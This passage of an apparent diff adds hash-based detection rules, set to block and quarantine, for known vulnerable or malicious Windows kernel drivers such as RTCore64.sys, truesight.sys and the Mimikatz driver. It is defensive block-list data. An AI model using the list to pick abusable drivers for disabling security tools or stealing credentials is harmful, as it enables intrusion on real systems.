"2026-03-23T11:45:29.605549Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff9b3fc49bb3cd9a2ffea2dd8075a34908346fb8393aa2bf13aa15ac72583928", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cde47c20-b24e-5659-9c6d-e01f6eb44a47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146044Z", + "creation_date": "2026-03-23T11:45:32.146046Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146052Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d590ee21ef889c847c8c80efe07f91cae4390d5663e6dc7a81077efce3737249", + "comment": "Malicious Kernel Driver (aka kavservice.bin) [https://www.loldrivers.io/drivers/77157886-00f9-4f6e-b217-d896813b630f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdeb9640-2df0-5908-80d3-7eeb3e36f452", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604301Z", + "creation_date": "2026-03-23T11:45:29.604303Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df101558cf68e3f50fb468248699e6f3938be7a893680bd4803fc2afe20bfd78", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdebcc04-f00e-5f6f-b555-f9852bc14ad4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818381Z", + "creation_date": "2026-03-23T11:45:30.818383Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818388Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f13f6a4bf7711216c9e911f18dfa2735222551fb1f8c1a645a8674c1983ccea6", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdf5ec76-327d-51e9-9d74-dc6e47b0369d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816767Z", + "creation_date": "2026-03-23T11:45:30.816769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.816775Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7e5bd0090962b4f31e17ab3d1f97bd9870d23238b591a70e27a0c91db138f95", + "comment": "Vulnerable Kernel Driver (aka WiRwaDrv.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdf8f987-617c-5fd1-b67c-25252b9e76ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970990Z", + "creation_date": "2026-03-23T11:45:29.970993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971001Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f902d78dada1658d688b1a8aac6ef48bdf968c859149f60f6c26e5b8af4656da", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdfa3b3a-c6c9-58cd-8450-36efac53b6e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970864Z", + "creation_date": "2026-03-23T11:45:29.970867Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970891Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a9915ea7863a0d26c69402287a1afc8af360a5318b970d9b36f8820e5c9e568", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce0328e7-c8a3-5c55-9ef4-5dbb70a9e23f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460637Z", + "creation_date": "2026-03-23T11:45:30.460640Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08828990218ebb4415c1bb33fa2b0a009efd0784b18b3f7ecd3bc078343f7208", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) 
[https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce03db4f-19d3-548d-bf13-a59b2ebf70b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473862Z", + "creation_date": "2026-03-23T11:45:31.473866Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473894Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4aea15c43e587f43baa437ef48bd9c70f692a35ba9510537122fa60ae6439a78", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce0489ef-6d69-5586-9fef-01796631666d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836359Z", + "creation_date": 
"2026-03-23T11:45:30.836361Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836367Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25ed1a52146816e02d41cf3938de7174806f58aad8f1e8c0ddc3801d20e60819", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce08f2c3-e400-57c2-8498-b7ed1db2dcab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620048Z", + "creation_date": "2026-03-23T11:45:29.620053Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "976c015b28197ccd15f807b776f705bdf612fc622fb0a4b9901b90f180bf2f8a", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ce0a8a7a-2005-50b8-a2c5-aa16afd9d128", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817123Z", + "creation_date": "2026-03-23T11:45:30.817125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4dc11b7922bf2674ca9673638e7fe4e26aceb0ebdc528e6d10c8676e555d7b2", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce198238-36b3-5b91-9ad2-33c4776d41f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817250Z", + "creation_date": "2026-03-23T11:45:30.817252Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.817258Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5daa8fa3b5db2e6225a2effea41af95fe7ffc579550c4081c8028ed33bc023b8", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce1ae374-d2de-5dae-ab6d-d76f9028c869", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816118Z", + "creation_date": "2026-03-23T11:45:30.816120Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9303894ee50d95911ccd4583b2aa5484db63de0d8f799b14854577e15914df2d", + "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce1b53b4-f08c-5b62-948b-a45db7a77877", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494815Z", + "creation_date": "2026-03-23T11:45:31.494822Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0a01628d39cd0fd2542aceb122c84ff022417860480ca348ade49ca0ae6f5c4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce1e1fe9-f5e5-5d7c-8bc5-09fa9a03ea16", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617850Z", + "creation_date": "2026-03-23T11:45:29.617852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0a89a6ab2fca486480b6e3dacf392d6ce0c59a5bdb4bcd18d672feb4ebb0543c", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce329b47-47aa-59a9-b141-a197b231c51c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492610Z", + "creation_date": "2026-03-23T11:45:31.492612Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18b794710453ffbf8ea6812b3c67f0834c5262547097e7509bc3d8e13aaa3500", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce3e4491-5fad-5e16-840e-acc9b5f7e447", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828737Z", + "creation_date": "2026-03-23T11:45:30.828739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58a4e00d40077cb1532967dc9a66d485a9e580a4f9d4ab4052f645bc76028c43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce459142-5004-5235-8dc4-2f2f7152d10d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817515Z", + "creation_date": "2026-03-23T11:45:31.817517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4bec310f9a33386df4085f4d4df5880572f2ba44ae258d466e2b0551ea5df9d", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce48afdc-2747-5090-8157-f2dafcf192b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499349Z", + "creation_date": "2026-03-23T11:45:31.499352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499360Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cdb7d0ecd7c09135ffea8f715e1b52c9e193d87ee46f460d826c50b4578d1a9e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce49b158-22b6-537f-a1a9-ce79dc4aeb14", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455164Z", + "creation_date": "2026-03-23T11:45:30.455167Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16b6be03495a4f4cf394194566bb02061fba2256cc04dcbde5aa6a17e41b7650", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce4eeabf-d1ad-51db-a76f-5876c15c7e49", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475923Z", + "creation_date": "2026-03-23T11:45:30.475927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e89cb7217ec1568b43ad9ca35bf059b17c3e26f093e373ab6ebdeee24272db21", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ce4fc928-5627-54e4-88c3-facc56c5e687", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157205Z", + "creation_date": "2026-03-23T11:45:31.157207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96d381aa428e3d885b399285e19a8b6aeafc94d736d3575cd5af8f8f58c0d979", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce58d9f1-605e-5a80-a21c-84eb03f355f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483920Z", + "creation_date": "2026-03-23T11:45:31.483924Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.483935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5f6dc31336aaaa2fda0af4c38855cb33bdabc66faca07304bc163c490619500", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce63c5a3-c672-57ed-8455-28fccbd5b21b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490829Z", + "creation_date": "2026-03-23T11:45:31.490850Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490858Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe9520ae42fc9ea258ca7fd2054b4e05acc1aa45089a703fd486753eba57ab11", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce68c78e-37d5-56b9-89c8-5d3b922a1db5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
